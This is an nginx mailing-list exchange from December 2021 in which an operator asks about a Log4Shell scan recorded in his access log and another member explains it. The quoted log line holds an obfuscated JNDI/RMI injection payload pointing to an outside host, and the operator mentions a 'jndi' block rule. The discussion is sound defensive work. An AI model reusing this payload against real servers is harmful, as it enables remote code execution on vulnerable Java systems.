<div dir="ltr">The request is for your index page "GET / HTTP/1.1"; that's why your server responded with 200 OK. The special characters are in the referer and user-agent fields, as a log4j system would also try to interpolate these, and thus be vulnerable to the exploit.</div><br><div class="gmail_quote"><div dir="ltr" class="gmail_attr">On Mon, 20 Dec 2021 at 04:02, <a href="mailto:lists@lazygranch.com">lists@lazygranch.com</a> <<a href="mailto:lists@lazygranch.com">lists@lazygranch.com</a>> wrote:<br></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex">I don't have any service using java so I don't believe I am subject to<br>
this exploit. Howerver I am confused why a returned a 200 for this<br>
request. The special characters in the URL are confusing.<br>
<br>
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://<a href="http://185.254.196.236:1389/jijec" rel="noreferrer" target="_blank">185.254.196.236:1389/jijec</a>}" "${${lower:jndi}:${lower:rmi}://<a href="http://185.254.196.236:1389/jijec" rel="noreferrer" target="_blank">185.254.196.236:1389/jijec</a>}" "-"<br>
<br>
    log_format  main  '$status $remote_addr - $remote_user<br>
    [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '<br>
                      '"$http_user_agent" "$http_x_forwarded_for"';<br>
<br>
That is my log format from the nginx.conf. <br>
<br>
I now have a map to catch "jndi" in both url and agent. So far so good<br>
not that it matters much. I just like to gather IP addresses from<br>
hackers and block their host if it lacks eyeballs,<br>
_______________________________________________<br>
nginx mailing list<br>
<a href="mailto:nginx@nginx.org" target="_blank">nginx@nginx.org</a><br>
<a href="http://mailman.nginx.org/mailman/listinfo/nginx" rel="noreferrer" target="_blank">http://mailman.nginx.org/mailman/listinfo/nginx</a><br>
</blockquote></div><br clear="all"><div><br></div>-- <br><div dir="ltr" class="gmail_signature">Jay Caines-Gooby<br><a href="http://jay.gooby.org" target="_blank">http://jay.gooby.org</a><br><a href="mailto:jay@gooby.org" target="_blank">jay@gooby.org</a><br>+44 (0)7956 182625<br>twitter, skype & aim: jaygooby<br>gtalk: <a href="mailto:jaygooby@gmail.com" target="_blank">jaygooby@gmail.com</a><br></div>